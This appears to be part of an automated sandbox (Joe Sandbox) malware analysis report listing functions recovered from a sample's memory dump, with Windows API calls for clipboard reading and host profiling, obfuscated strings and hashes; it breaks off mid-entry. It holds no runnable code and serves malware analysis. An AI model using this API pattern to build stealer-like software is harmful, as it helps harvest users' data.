K~sn, xrefs: 00418E6B
( ,, xrefs: 00418BFC
`eww, xrefs: 00418E64
bn|v, xrefs: 00418E5D

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: :0:?$K~sn$[gir$`eww$bn|v$fmUn$( ,
API String ID: 0-1256593453
Opcode ID: 4fba82a8c6c56883577338f20fa8de2e8060acce42d7248c8796182be2059860
Instruction ID: 01ee550ed819a452130d430e0a658c01ac3f2692edea05ace0f2ebf761c40517
Opcode Fuzzy Hash: 4fba82a8c6c56883577338f20fa8de2e8060acce42d7248c8796182be2059860
Instruction Fuzzy Hash: 1CF125B56007418FD724CF24C891663BBF1FF5A304F188A6ED4968B792EB38E841CB58

Function 004229DD Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 502
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=>, xrefs: 00422F8C
Fh*, xrefs: 00422FAA
Fh*, xrefs: 00422E3A
\1B, xrefs: 00422A2E
X@, xrefs: 00422BAE

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: =>$Fh*$Fh*$X@$\1B
API String ID: 0-802004947
Opcode ID: 26a475c36512cd745314daa29d6fbd268818a5e97578026749e9adf895458265
Instruction ID: 0f87163ce4708cb2411d9a3e5d3f05537a25cca973dc2943dddbe2600b269d0b
Opcode Fuzzy Hash: 26a475c36512cd745314daa29d6fbd268818a5e97578026749e9adf895458265
Instruction Fuzzy Hash: 0AE11FB56083108FD314DF99E88262BBBE2FBD1314F49896DF5918B361DBB8C905CB16

Function 004087D0 Relevance: 7.7, APIs: 5, Instructions: 185
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040889C
GetCurrentThreadId.KERNEL32 ref: 004088A5
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408999
GetForegroundWindow.USER32 ref: 004089C0

Part of subcall function 0040C9E0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C9F3

Part of subcall function 0040B9E0: FreeLibrary.KERNEL32(00408A1C), ref: 0040B9E6
Part of subcall function 0040B9E0: FreeLibrary.KERNEL32 ref: 0040BA07

ExitProcess.KERNEL32 ref: 00408A35

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 1f46c23841fd0bc96f87fedc87c99cacfa356c786bec9e71097507aa074865a8
Instruction ID: f05c4ebcf40ce7b261a965fd212a9ea12e07fe9b2236fbe8c0b4e82e4c49085a
Opcode Fuzzy Hash: 1f46c23841fd0bc96f87fedc87c99cacfa356c786bec9e71097507aa074865a8
Instruction Fuzzy Hash: D35159B3F003140BD718AE799D9635676979BC4314F0E823E6994EB3E5FD7C8C168284

Function 0042B641 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B66D
GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B814

Strings

kvri, xrefs: 0042B823
ido1, xrefs: 0042B82A

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: ComputerName
String ID: ido1$kvri
API String ID: 3545744682-1372408504
Opcode ID: 7d715f03c417f409de8652eb1d818ab92eb4fc9fe7142f8cb010c132346da33c
Instruction ID: d63b2dff0a2d8081cc2d2a2520883f01022b2cf2ab299a95e8ea2bcb53456646
Opcode Fuzzy Hash: 7d715f03c417f409de8652eb1d818ab92eb4fc9fe7142f8cb010c132346da33c
Instruction Fuzzy Hash: DCE135702047918FD725CF29D490762BBE2EF97314F18C59EC4DA4B7A2C739A846CB94

Function 004310F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00431139
GetSystemMetrics.USER32 ref: 00431149

Strings

, xrefs: 00431236

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 932f3a8baaf2f4c12b15b1271b6f04031b308d53098c167ea3f8c5ae8c32a5f3
Instruction ID: 04d46c727a6fcf63ca4183bf7cfccd4dfebfccbbcb55db5b15a838c0db64b75f
Opcode Fuzzy Hash: 932f3a8baaf2f4c12b15b1271b6f04031b308d53098c167ea3f8c5ae8c32a5f3
Instruction Fuzzy Hash: D4A15DB05097818FE760DF55D54879ABBE0ABC5308F00892EE5AD9B252C7B86448CF9A

Function 0042BED5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C98E

Strings

ptBu, xrefs: 0042CAB8

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ptBu
API String ID: 3960555810-4221769528
Opcode ID: 420dd60d1444e5e7852c0f347a47c84510b9fc7941039308dad69c1143b0d6dc
Instruction ID: c138e8db1dfbc5701062052a0f37211ae36591ed7cbaa1d9e3076125472ea853
Opcode Fuzzy Hash: 420dd60d1444e5e7852c0f347a47c84510b9fc7941039308dad69c1143b0d6dc
Instruction Fuzzy Hash: 039116B06047528FD716CF29D0A0766FBE1BF57300F28819EC4DA8B752C739A846CB94

Function 0043A920 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043DA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A94E

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C980 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

@, xrefs: 0043C9ED

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: de0dddd2e262f71d6da807715d313315978ddf56e4e618164399e902ec13cf6a
Instruction ID: ed9861d180ddf529acc8b0ce082a53df043cfa1399054261649451575e1f9c7d
Opcode Fuzzy Hash: de0dddd2e262f71d6da807715d313315978ddf56e4e618164399e902ec13cf6a
Instruction Fuzzy Hash: 8F3164725083088FC314EF94DCC866FB7E5EBC9310F05993DEA8997391E73998489796

Function 0043CAD0 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e196c45f75a37f8143e787a28a84cc2b04dbef04a6d609d28cf6394a1ab73cb
Instruction ID: bf16f2f6ce44ddd74e1d44e8765b90081ca933525a91ab78435fddcf8c0a7c79
Opcode Fuzzy Hash: 9e196c45f75a37f8143e787a28a84cc2b04dbef04a6d609d28cf6394a1ab73cb
Instruction Fuzzy Hash: 4E815C36A043149BD720AF18DC9166BB7A2EFC9710F0AD53DEC896B351EB38AC51C785

Function 00438EB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad01c26361ef1f686d39a0a1ab033dbe633fe49fb11498ac35ed0cdbf2bd2954
Instruction ID: ea51a2f480b5396187e6ee67b7f938f70bfd8b529b49f0b83a4bbfcca61f5e4a
Opcode Fuzzy Hash: ad01c26361ef1f686d39a0a1ab033dbe633fe49fb11498ac35ed0cdbf2bd2954
Instruction Fuzzy Hash: 3C717873F043104FE7249E25DC8072BF6E3ABD9B14F1E852DD889A7355DA79AC01878A

Function 0043A7E9 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9634cda44d1f171db851eb71e7267d491757f81cd3146199af540818ef70563
Instruction ID: e90d3f3fe0c413f848e70014e1496ec70582230fcca7aa3453c7d5b1019d311c
Opcode Fuzzy Hash: b9634cda44d1f171db851eb71e7267d491757f81cd3146199af540818ef70563
Instruction Fuzzy Hash: 2031317028C3419BD704EF288C11A1BB7B2EFC9304F64C92CE0A55B766CB79C10ACB4A

Function 0040D2EA Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee25ab57244a32f4f650599fa07674d44b8f9ac8a061e1fd35c2ec04dc7be24a
Instruction ID: af79d7d12f64ee9bd2ad253b6656d60a30a230a1b7f6c3fb9544c34c20605b82
Opcode Fuzzy Hash: ee25ab57244a32f4f650599fa07674d44b8f9ac8a061e1fd35c2ec04dc7be24a
Instruction Fuzzy Hash: 6621AC705183819FE728CF28C850BAFB7E1FB86304F14892DE48EA7291D7785849CB5B

Function 0043A742 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968aff7786998a17d1bb58fe0fa8392212d74bc3bff32f55d0af784c501e8337
Instruction ID: b673a51aa90044103ac93cc8b767b384712972b14727f05c86367817ff4802e4
Opcode Fuzzy Hash: 968aff7786998a17d1bb58fe0fa8392212d74bc3bff32f55d0af784c501e8337
Instruction Fuzzy Hash: 7701DE7464C3418BD744DF288C51A1BB7B2EFC6308F55CA2CE0A56B766CB75D10ACB4A

Function 0042B715 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042BEF9

Strings

Wu, xrefs: 0042BEF9, 0042BF17

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: 4f59d2d48b843f9d69bb6037eb0ebbce4795cec77d6df5c080272f5459bd78a8
Instruction ID: d0e48a199c6c705821f8c8f25112402aa775e3dd908bc2a6c761a244230c4604
Opcode Fuzzy Hash: 4f59d2d48b843f9d69bb6037eb0ebbce4795cec77d6df5c080272f5459bd78a8
Instruction Fuzzy Hash: B751CB34204B918FD712CB39C890772BBE2EF9B314B54849DD4D68FB62C73AA846CB55

Function 00434C7C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00434CC5

Strings

EY^_, xrefs: 00434CF9

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: EY^_
API String ID: 95929093-823090835
Opcode ID: b76cbd1fba661034c6466c15b78dc8b917ed0142ffd14d889937db8a52926065
Instruction ID: e10ab3c99f7f8d5ce9be94f7c35abd0534f001e00319619e606950232d4e62aa
Opcode Fuzzy Hash: b76cbd1fba661034c6466c15b78dc8b917ed0142ffd14d889937db8a52926065
Instruction Fuzzy Hash: 7031F772E066608BDB24CB388D547D9BBF26F99310F1A42EEC49DA7382C6785E408F05

Function 0043AB24 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043AB24
GetForegroundWindow.USER32 ref: 0043AB40

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 9893edea59b7e0fad5d6d91302da895a5db43a1e14b24a3f0c3d14b51b3644ae
Instruction ID: 4e6f42bc6e9ec1ce3cdc45c9cef6da730f5af56c043af0f6ab6a0960455678fb
Opcode Fuzzy Hash: 9893edea59b7e0fad5d6d91302da895a5db43a1e14b24a3f0c3d14b51b3644ae
Instruction Fuzzy Hash: AFD0C2F98201028BCB04E760EC8A54B336CAF4630EB05A53AE44642222E630E0198B9A

Function 0042E93A Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E908

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 76b977183dd9a3675f66b87f0ce3d1f8805c79026f83394b709af262b4886394
Instruction ID: 9f9cc846f9fca98229d874a9418a49e170beaae385d900fa59bf5332ee11c714
Opcode Fuzzy Hash: 76b977183dd9a3675f66b87f0ce3d1f8805c79026f83394b709af262b4886394
Instruction Fuzzy Hash: 361187752093428FD301CF24C56971ABBF2FF8A304F29849EC5818B396C771A90ACF82

Function 0043A8B0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,464544F7), ref: 0043A8F0

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f6e2d35028883212e0f5e692398fa47a2daf3078955133b356c799c8fcd0c996
Instruction ID: 89aec2776fedd04ff2a413ddbcea0f2b36bcf95737ff2a510bb1afe44e2b57e4
Opcode Fuzzy Hash: f6e2d35028883212e0f5e692398fa47a2daf3078955133b356c799c8fcd0c996
Instruction Fuzzy Hash: C3F0E576458211EFD2005F24BD06A1B7679AFCB715F06183AF400A6125DB39D8228A9B

Function 0042E8BD Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E908

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 847407a19e9de592cf8cec26a3f70373d4fdddf07bf9d1d2214c83a4d3ecff9a
Instruction ID: c2ea10bbbc342d55b6a5e582abf7f968dd8261ff882d82c803fb8b524232a478
Opcode Fuzzy Hash: 847407a19e9de592cf8cec26a3f70373d4fdddf07bf9d1d2214c83a4d3ecff9a
Instruction Fuzzy Hash: 5FF0E2B52087028FE300DF24C55830BBBE2BB85308F25892CE0A44B350C7B9AA498FC2

Function 004305C2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043060A

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 75ba2b190f47cbb7035b54958a3fd5d80262b4a83c84d6207e4996931555e715
Instruction ID: 10d855e5c6684aefa2fb1df8b888794788b437267940309438ca6748c22339cf
Opcode Fuzzy Hash: 75ba2b190f47cbb7035b54958a3fd5d80262b4a83c84d6207e4996931555e715
Instruction Fuzzy Hash: ACF0A4B45087018FD310DF28D1A875ABBF0FB89344F00891DE4998B790C7B5AA48CF86

Function 0040C9E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C9F3

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ecca21c120f2f82af5a9cad114ad32730c5a60672c201f3a9ef6adc200df7984
Instruction ID: 63aa8f0bc88f994a071c9f73c7a3e08608f8f997c92f1d08c8efec782cddfa46
Opcode Fuzzy Hash: ecca21c120f2f82af5a9cad114ad32730c5a60672c201f3a9ef6adc200df7984
Instruction Fuzzy Hash: 5BE0C276B6454457E2046B68DD0BF45362BC3863A0F488235B250CA6D4D968B800C199

Function 0040CA1E Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA30

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: bbd585b431aa263293fae164f7e9035c6ab6c78baff5ccd54bccc5b46d820388
Instruction ID: 474a69cfb0ba6151aa04b8b3bd1b9595c5e929bae7f852010499b0bfe04890d8
Opcode Fuzzy Hash: bbd585b431aa263293fae164f7e9035c6ab6c78baff5ccd54bccc5b46d820388
Instruction Fuzzy Hash: 52D0C9343C43817AF5648F18AC17F103355A742F11FB10624B362FE2D0C9E0B1119A1C

Function 00438E80 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004129EE), ref: 00438EA0

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d5cc84de357097e94fdb21de813d0ee61070cb00c212c5f5426df591f987b0ff
Instruction ID: c589224f3f2eb4c5d691815d08215f60b763c00d8e9891d85a343a2b72f614b8
Opcode Fuzzy Hash: d5cc84de357097e94fdb21de813d0ee61070cb00c212c5f5426df591f987b0ff
Instruction Fuzzy Hash: 4FD0C932409232EBC6102F18BC05BCB3B64AF4A761F0748A1B900BA0A5C665EC918AD8

Function 00438E60 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00000000,?,0043A8FE,00000000,?,00000000,0040B884,00000000,00000001), ref: 00438E70

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ae9bab136ce258492607cd5366836328feb510ad2efbb1661fc331a96d9036c6
Instruction ID: af66c84214ae472e22add953b67e4ae8b3737a3f52b8191d30aaacddce4c7340
Opcode Fuzzy Hash: ae9bab136ce258492607cd5366836328feb510ad2efbb1661fc331a96d9036c6
Instruction Fuzzy Hash: B5C09B31045220EBC6542B55FC05FCA3F64EF45765F011055F504770B1C760AC91CBD8

Non-executed Functions

Function 004235A0 Relevance: 31.0, Strings: 24, Instructions: 1017COMMON

Download Yara Rule

Strings

=S2U, xrefs: 0042400B
<{:}, xrefs: 00424079
^P, xrefs: 004239B5
j;@=, xrefs: 00423FC9
I'G), xrefs: 00423FEA
8X, xrefs: 00423DD0
z{, xrefs: 004236CF
!s#u, xrefs: 00424063
7g9i, xrefs: 0042409A
#w;y, xrefs: 0042406E
*G'I, xrefs: 00424042
3c7e, xrefs: 0042408F
IzK|, xrefs: 004242D6
%K'M, xrefs: 0042404D
ArCt, xrefs: 0042425E
o2g4, xrefs: 004238B8
IzK|, xrefs: 004241E5, 00424204
A+P-, xrefs: 00423FF5
?W4Y, xrefs: 00424016
st, xrefs: 00423803
LINO, xrefs: 0042442F
M~Op, xrefs: 00424256
N3e5, xrefs: 00423FB3
2O)q, xrefs: 00424058

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: ^P$!s#u$#w;y$%K'M$*G'I$2O)q$3c7e$7g9i$8X$<{:}$=S2U$?W4Y$A+P-$ArCt$I'G)$IzK|$IzK|$LINO$M~Op$N3e5$j;@=$o2g4$st$z{
API String ID: 0-2268861036
Opcode ID: 3eed8ad7cb90c2059c589e2b9b0f9aba32073607d3bbd3478d29b06dbeca9337
Instruction ID: b78e75a223094c9e40a8854b5f698ca80566fa0564d3eee0e17689add2129a70
Opcode Fuzzy Hash: 3eed8ad7cb90c2059c589e2b9b0f9aba32073607d3bbd3478d29b06dbeca9337
Instruction Fuzzy Hash: 469261B56083918BC730CF64E8417AFBBF1EBD2704F40882DE4D9AB251D7759946CB8A

Function 00409350 Relevance: 14.1, Strings: 11, Instructions: 348COMMON

Download Yara Rule

Strings

^*/%, xrefs: 0040938F
6ZT , xrefs: 0040937F
C{, xrefs: 00409414
7@k*, xrefs: 0040942C
$?V~, xrefs: 0040944C
;1T, xrefs: 00409377
sYs2, xrefs: 0040945C
%#7%, xrefs: 0040943C
Nf99, xrefs: 00409444
2<2}, xrefs: 00409434
;'#5, xrefs: 00409454

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: C{$$?V~$%#7%$2<2}$6ZT $7@k*$;'#5$;1T$Nf99$^*/%$sYs2
API String ID: 0-2115841832
Opcode ID: f7d464e858b518fa56d074583db9f85da899ee534603e6e99546933e4902c78e
Instruction ID: d4a91e74dea4013e8292f196a89552244546f209ee50252737da41fb91a20421
Opcode Fuzzy Hash: f7d464e858b518fa56d074583db9f85da899ee534603e6e99546933e4902c78e
Instruction Fuzzy Hash: 63B1F87264C3919BC3268F29889076BFFE0AFD7204F48496DE4D55B382D739890AC756

Function 004262FB Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

\&@8, xrefs: 004264B6
Y>Y0, xrefs: 004264C4
N*G,, xrefs: 004264A1
N.P , xrefs: 004264A8
_"E$, xrefs: 004264AF

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: N*G,$N.P $Y>Y0$\&@8$_"E$
API String ID: 0-5762990
Opcode ID: d8388a94b960af987234ba7f0aae286f69850c5882b9d2d5111c65fbb6314520
Instruction ID: 2ca33cb4714c27772913a42618bd44c3204156104a87f4ca2dc341f661a4c5fb
Opcode Fuzzy Hash: d8388a94b960af987234ba7f0aae286f69850c5882b9d2d5111c65fbb6314520
Instruction Fuzzy Hash: CBB198B5A00211CFDB14CF64E84236ABBB1FF85314F1981ADD941AF396D779A851CBC8

Function 00430F40 Relevance: 9.1, APIs: 6, Instructions: 128clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00430F50
GetClipboardData.USER32 ref: 00430F6B
GlobalLock.KERNEL32 ref: 00430F8A
GlobalUnlock.KERNEL32 ref: 004310CF
CloseClipboard.USER32 ref: 004310D8

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62c3ec2f4003cdf273d187df7a610305df2015ac55a568144b8da01a1970411b
Instruction ID: 2f4061cbbd61608ce6a63aeb0fa36b56492298bbff138925a3b5276bd9333b36
Opcode Fuzzy Hash: 62c3ec2f4003cdf273d187df7a610305df2015ac55a568144b8da01a1970411b
Instruction Fuzzy Hash: 0241C57160C7818FC314AF7C898832FBEE1AB96224F054B3DE5E6872D2D6388549C757

Function 00313178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00312B49,00000002,00000000,?,?,?,00312B49,?,00000000), ref: 00313211
GetLocaleInfoW.KERNEL32(?,20001004,00312B49,00000002,00000000,?,?,?,00312B49,?,00000000), ref: 0031323A
GetACP.KERNEL32(?,?,00312B49,?,00000000), ref: 0031324F

Strings

OCP, xrefs: 003131CC
ACP, xrefs: 00313196

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 31af35c6b71e2d962365d71d40d21a60b33455a1e4ff40e152bb062977844421
Instruction ID: 907724229b9681246551c6aaacabae83fa255140d81345fc7e9860694cd62ca5
